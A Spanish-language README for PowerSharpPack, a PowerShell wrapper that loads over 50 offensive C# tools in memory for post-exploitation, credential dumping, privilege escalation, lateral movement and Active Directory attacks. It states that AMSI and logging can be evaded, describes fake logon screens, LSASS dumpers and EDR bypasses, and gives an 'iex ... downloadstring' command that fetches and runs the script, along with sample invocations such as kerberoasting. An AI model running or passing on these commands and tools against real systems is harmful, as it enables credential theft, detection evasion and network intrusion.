
Wrapper de PowerShell que agrupa más de 50 herramientas de seguridad ofensiva en C# para post-explotación, escalada de privilegios, volcado de credenciales, movimiento lateral y reconocimiento de Active Directory en compromisos de equipo rojo.
Muchos proyectos ofensivos útiles en CSharp envueltos en PowerShell para un fácil uso.
¿Por qué? En mi opinión personal, el PowerShell ofensivo no está muerto debido a AMSI, el registro de bloques de script, el modo de lenguaje restringido u otras características de protección. Cualquiera de estos mecanismos puede ser evitado. Dado que la mayoría de los nuevos proyectos innovadores de seguridad ofensiva están escritos en C#, decidí hacerlos utilizables también en PowerShell.
Entonces, ¿qué hice básicamente aquí?
[System.Reflection.Assembly]::Load($DecompressedDecodedBinary).Es un proceso muy fácil, pero para muchos repositorios consume mucho tiempo.
¿Qué herramientas están incluidas?
Internalmonologue
Ataque de monólogo interno: recuperación de hashes NTLM sin tocar LSASS
@Crédito a: https://github.com/eladshamir/Internal-Monologue
Seatbelt
Seatbelt es un proyecto en C# que realiza una serie de "comprobaciones de seguridad" orientadas a la auditoría de sistemas, relevantes tanto desde perspectivas de seguridad ofensiva como defensiva.
@Crédito a: https://github.com/GhostPack/Seatbelt
SharpWeb
Proyecto .NET 2.0 CLR para recuperar credenciales guardadas del navegador de Google Chrome, Mozilla Firefox y Microsoft Internet Explorer/Edge.
@Crédito a: https://github.com/djhohnstein/SharpWeb
UrbanBishop
Crea una sección RW local en UrbanBishop y luego mapea esa sección como RX en un proceso remoto. Carga de shellcode simplificada.
@Crédito a: https://github.com/FuzzySecurity/Sharp-Suite
SharpUp
SharpUp es un puerto en C# de varias funcionalidades de PowerUp.
@Crédito a: https://github.com/GhostPack/SharpUp
Rubeus
Rubeus es un conjunto de herramientas en C# para la interacción y abusos del Kerberos puro.
@Crédito a: https://github.com/GhostPack/Rubeus && https://github.com/gentilkiwi/kekeo/
SharPersist
Kit de herramientas de persistencia en Windows escrito en C#.
@Crédito a: https://github.com/fireeye/SharPersist
Sharpview
Implementación en C# del PowerView de harmj0y
@Crédito a: https://github.com/tevora-threat/SharpView
winPEAS
Revisa la lista de verificación de escalada de privilegios local de Windows desde book.hacktricks.xyz
@Crédito a: https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/winPEAS
Lockless
Lockless permite la copia de archivos bloqueados.
@Crédito a: https://github.com/GhostPack/Lockless
SharpChromium
Proyecto .NET 4.0 CLR para recuperar datos de Chromium, como cookies, historial e inicios de sesión guardados.
@Crédito a: https://github.com/djhohnstein/SharpChromium
SharpDPAPI
SharpDPAPI es un puerto en C# de algunas funcionalidades de DPAPI de Mimikatz.
@Crédito a: https://github.com/GhostPack/SharpDPAPI && https://github.com/gentilkiwi/mimikatz/
SharpShares
Enumera todos los recursos compartidos de red en el dominio actual. También puede resolver nombres a direcciones IP.
@Crédito a: https://github.com/djhohnstein/SharpShares
SharpSniper
Encuentra usuarios específicos en Active Directory mediante su nombre de usuario y dirección IP de inicio de sesión.
@Crédito a: https://github.com/HunnicCyber/SharpSniper
SharpSpray
SharpSpray es un conjunto de código simple para realizar un ataque de spraying de contraseñas contra todos los usuarios de un dominio usando LDAP y es compatible con Cobalt Strike.
@Crédito a: https://github.com/jnqpblc/SharpSpray
Watson
Enumera KBs faltantes y sugiere exploits para vulnerabilidades útiles de escalada de privilegios.
@Crédito a: https://github.com/rasta-mouse/Watson
Grouper2
Encuentra vulnerabilidades en la directiva de grupo de AD.
@Crédito a: https://github.com/l0ss/Grouper2
Tokenvator
Una herramienta para elevar privilegios con tokens de Windows.
@Crédito a: https://github.com/0xbadjuju/Tokenvator
SauronEye
Herramienta de búsqueda para encontrar archivos específicos que contengan palabras específicas, por ejemplo, archivos que contengan contraseñas.
@Crédito a: https://github.com/vivami/SauronEye
Simplemente carga el script principal con
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/PowerSharpPack/master/PowerSharpPack.ps1')
y elige la herramienta como parámetro switch, por ejemplo:
PowerSharpPack -seatbelt -Command "AMSIProviders"
Si deseas pasar múltiples parámetros al binario, puedes usar comillas como:
PowerSharpPack -Rubeus -Command "kerberoast /outfile:Roasted.txt"
Si no quieres cargar todos los binarios por alguna razón, puedes usar los scripts de PowerShell por binario ubicados en la carpeta PowerSharpBinaries.
Proyectos que también están disponibles como script independiente de PowerShell:
SharpCloud
C# simple para verificar la existencia de archivos de credenciales relacionados con AWS, Microsoft Azure y Google Compute.
@Crédito a: https://github.com/chrismaddalena/SharpCloud
SharpSSDP
Descubrimiento de servicios SSDP.
@Crédito a: https://github.com/rvrsh3ll/SharpSSDP
DAFT
DAFT: Marco y kit de herramientas de auditoría de bases de datos.
@Crédito a: https://github.com/NetSPI/DAFT
Get-RBCD-Threaded
Herramienta para descubrir rutas de ataque de delegación restringida basada en recursos en entornos de Active Directory.
@Crédito a: https://github.com/FatRodzianko/Get-RBCD-Threaded
SharpGPO-RemoteAccessPolicies
Una herramienta en C# para enumerar políticas de acceso remoto a través de directivas de grupo.
@Crédito a: https://github.com/FSecureLABS/SharpGPO-RemoteAccessPolicies
SharpAllowedToAct
Toma de control de objetos de computadora mediante delegación restringida basada en recursos (msDS-AllowedToActOnBehalfOfOtherIdentity).
@Crédito a: https://github.com/pkb1s/SharpAllowedToAct
WireTap
Proyecto .NET 4.0 para interactuar con hardware de video, audio y teclado.
@Crédito a: https://github.com/djhohnstein/WireTap
SharpClipboard
Monitor de portapapeles en C#.
@Crédito a: https://github.com/slyd0g/SharpClipboard
SharpPrinter
Descubre impresoras y verifica vulnerabilidades.
@Crédito a: https://github.com/rvrsh3ll/SharpPrinter
SharpHide
Herramienta para crear claves de registro ocultas.
@Crédito a: https://github.com/outflanknl/SharpHide
SpoolSample
Herramienta PoC para forzar a hosts Windows a autenticarse en otras máquinas a través de la interfaz RPC de MS-RPRN. Esto también es posible mediante otros protocolos.
@Crédito a: https://github.com/leechristensen/SpoolSample
SharpGPOAbuse
SharpGPOAbuse es una aplicación .NET escrita en C# que puede ser utilizada para aprovechar los derechos de edición de un usuario sobre un Objeto de directiva de grupo (GPO) para comprometer los objetos controlados por ese GPO.
@Crédito a: https://github.com/FSecureLABS/SharpGPOAbuse
SharpDump
SharpDump es un puerto en C# de la funcionalidad Out-Minidump.ps1 de PowerSploit.
@Crédito a: https://github.com/GhostPack/SharpDump
SharpHound3
Colector de datos en C# para el proyecto BloodHound, versión 3.
@Crédito a: https://github.com/BloodHoundAD/SharpHound3
PostDump
Otra herramienta para realizar un minidump del proceso LSASS usando algunas técnicas para evitar la detección.
@Crédito a: https://github.com/YOLOP0wn/POSTDump
SharpLocker
SharpLocker ayuda a obtener las credenciales del usuario actual mostrando una pantalla de bloqueo falsa de Windows. Toda la salida se envía a la consola, lo que funciona perfectamente con Cobalt Strike.
@Crédito a: https://github.com/Pickfordmatt/SharpLocker
Eyewitness
EyeWitness está diseñado para tomar capturas de pantalla de sitios web, proporcionar información de encabezado del servidor e identificar credenciales predeterminadas si es posible.
@Crédito a: https://github.com/FortyNorthSecurity/EyeWitness
FakeLogonScreen
Pantalla de inicio de sesión falsa de Windows para robar contraseñas.
@Crédito a: https://github.com/bitsadmin/fakelogonscreen
P0wnedShell
Kit de herramientas de post-explotación en PowerShell Runspace.
@Crédito a: https://github.com/Cn33liz/p0wnedShell
Safetykatz
SafetyKatz es una combinación de una versión ligeramente modificada del proyecto Mimikatz de @gentilkiwi y el cargador PE .NET de @subTee. Lo modifiqué nuevamente con mi propia versión ofuscada de Mimikatz.
@Crédito a: https://github.com/GhostPack/SafetyKatz
InveighZero
Herramienta de suplantación/Man-in-the-middle en C# para Windows de LLMNR/mDNS/NBNS/DNS/DHCPv6.
@Crédito a: https://github.com/Kevin-Robertson/InveighZero
SharpSploit
SharpSploit es una biblioteca de post-explotación .NET escrita en C#.
@Crédito a: https://github.com/cobbr/SharpSploit
Snaffler
Una herramienta para pentesters para ayudar a encontrar "dulces" deliciosos, por @l0ss y @Sh3r4 (Twitter: @/mikeloss y @/sh3r4_hax).
@Crédito a: https://github.com/SnaffCon/Snaffler
BadPotato
Printspoofer de itm4n en C#.
@Crédito a: https://github.com/BeichenDream/BadPotato
BetterSafetyKatz
Fork de SafetyKatz que obtiene dinámicamente la última versión precompilada de Mimikatz directamente del repositorio de gentilkiwi en GitHub, parcha las firmas en tiempo de ejecución y usa DInvoke de SharpSploit para cargar PE en memoria.
@Crédito a: https://github.com/Flangvik/BetterSafetyKatz
SharpKatz
Puerto en C# de los comandos sekurlsa::logonpasswords, sekurlsa::ekeys y lsadump::dcsync de Mimikatz.
@Crédito a: https://github.com/b4rtik/SharpKatz
Gopher
Herramienta en C# para descubrir frutas de bajo riesgo.
@Crédito a: https://github.com/EncodeGroup/Gopher
SharpOxidResolver
IOXIDResolver de AirBus Security/PingCastle.
@Crédito a: https://github.com/vletoux/pingcastle/
SharpBlock
Un método para evitar la proyección activa de DLL por parte de EDR al prevenir la ejecución del punto de entrada.
@Crédito a: https://github.com/CCob/SharpBlock
SharpLoginPrompt
Este programa crea una solicitud de inicio de sesión para recopilar el nombre de usuario y la contraseña del usuario actual. Este proyecto permite al equipo rojo phishing de nombre de usuario y contraseña del usuario actual sin tocar lsass y sin tener credenciales de administrador en el sistema.
@Crédito a: https://github.com/shantanu561993/SharpLoginPrompt
ThunderFox
Recupera datos (contactos, correos electrónicos, historial, cookies y credenciales) de Thunderbird y Firefox.
@Crédito a: https://github.com/V1V1/SharpScribbles
StickyNotesExtract
Extrae datos de la base de datos de Sticky Notes de Windows. Funciona en Windows 10 Build 1607 y superiores. Este proyecto no depende de dependencias externas.
@Crédito a: https://github.com/V1V1/SharpScribbles
SCShell
Herramienta de movimiento lateral sin archivos que se basa en ChangeServiceConfigA para ejecutar comandos.
@Crédito a: https://github.com/Mr-Un1k0d3r/SCShell
SharpSecDump
Puerto .NET de la funcionalidad de volcado remoto de SAM + secretos LSA de secretsdump.py de impacket.
@Crédito a: https://github.com/G0ldenGunSec/SharpSecDump
SharpHandler
Este proyecto reutiliza handles abiertos a lsass para analizar o hacer minidump de lsass, por lo que no necesitas usar tu propio handle de lsass para interactuar con él.
@Crédito a: https://github.com/jfmaes/SharpHandler
SharpRDP
Aplicación de consola .NET para el protocolo de escritorio remoto para ejecución de comandos autenticada.
@Crédito a: https://github.com/0xthirteen/SharpRDP
SharpMove
Proyecto .NET para realizar ejecución remota autenticada.
@Crédito a: https://github.com/0xthirteen/SharpMove
SharpStay
Proyecto .NET para instalar persistencia.
@Crédito a: https://github.com/0xthirteen/SharpStay
SharpPrintNightmare
Implementación en C# de PrintNightmare CVE-2021-1675/CVE-2021-34527.
@Crédito a: https://github.com/cube0x0/CVE-2021-1675/tree/main/SharpPrintNightmare/SharpPrintNightmare
Certify
Abuso de certificados de Active Directory.
@Crédito a: https://github.com/GhostPack/Certify
Farmer
Farmer es un proyecto para recolectar hashes NetNTLM en un dominio de Windows. Farmer logra esto creando un servidor WebDAV local que hace que el Mini Redirector WebDAV se autentique desde cualquier cliente que se conecte.
@Crédito a: https://github.com/mdsecactivebreach/Farmer
SharpBypassUAC
Herramienta en C# para bypass de UAC.
@Crédito a: https://github.com/FatRodzianko/SharpBypassUAC
StandIn
StandIn es un pequeño kit de herramientas de post-explotación .NET35/45 para AD.
@Crédito a: https://github.com/FuzzySecurity/StandIn
Carbuncle
Herramienta para interactuar con la interoperabilidad de Outlook durante compromisos de equipos rojos.
@Crédito a: https://github.com/checkymander/Carbuncle
Whisker
Whisker es una herramienta en C# para tomar el control de cuentas de usuario y computadora de Active Directory mediante la manipulación de su atributo msDS-KeyCredentialLink, agregando efectivamente "Shadow Credentials" a la cuenta objetivo.
@Crédito a: https://github.com/eladshamir/Whisker
SharpLdapRelayScan
Puerto en C# de LdapRelayScan.
@Crédito a: https://github.com/klezVirus/SharpLdapRelayScan
LdapSignCheck
Proyecto en C# para verificar la firma LDAP.
@Crédito a: https://github.com/cube0x0/LdapSignCheck
SharpImpersonation
SharpImpersonation – Una herramienta de suplantación de usuario – mediante token o inyección de shellcode.
@Crédito a: https://github.com/S3cur3Th1sSh1t/SharpImpersonation
SharpWSUS
SharpWSUS es una herramienta en C# para movimiento lateral a través de WSUS. Hay un blog correspondiente (https://labs.nettitude.com/blog/introducing-sharpwsus/) que tiene información más detallada sobre la herramienta, el caso de uso y la detección.
@Crédito a: https://github.com/nettitude/SharpWSUS
MalSCCM
Esta herramienta te permite abusar de servidores SCCM locales o remotos para implementar aplicaciones maliciosas en los hosts que gestionan. Para usar esta herramienta, tu proceso actual debe tener derechos de administrador sobre el servidor SCCM. Normalmente, las implementaciones de SCCM tendrán el servidor de administración y el servidor principal en el mismo host, en cuyo caso el host devuelto por el comando locate puede usarse como servidor principal.
@Crédito a: https://github.com/nettitude/MalSCCM
KrbRelay
Marco para relay de Kerberos.
@Crédito a: https://github.com/cube0x0/KrbRelay
SharpSCCM
Una utilidad en C# para interactuar con SCCM.
@Crédito: https://github.com/Mayyhem/SharpSCCM
ShadowSpray
Una herramienta para rociar Shadow Credentials a través de un dominio completo con la esperanza de abusar de DACLs GenericWrite/GenericAll olvidadas sobre otros objetos en el dominio.
@Crédito: https://github.com/Dec0ne/ShadowSpray
Grouper3
Encuentra vulnerabilidades en la directiva de grupo de AD, pero hazlo mejor de lo que lo hacía Grouper2.
@Crédito a: https://github.com/Group3r/Group3r
HandleKatz
Volcador de lsass PIC usando handles clonados.
@Crédito a: https://github.com/codewhitesec/HandleKatz
NanoDump
Volcar LSASS como es debido.
@Crédito a: https://github.com/helpsystems/nanodump
PPLDump
Volcar la memoria de un PPL con un exploit de espacio de usuario.
@Crédito a: https://github.com/itm4n/PPLdump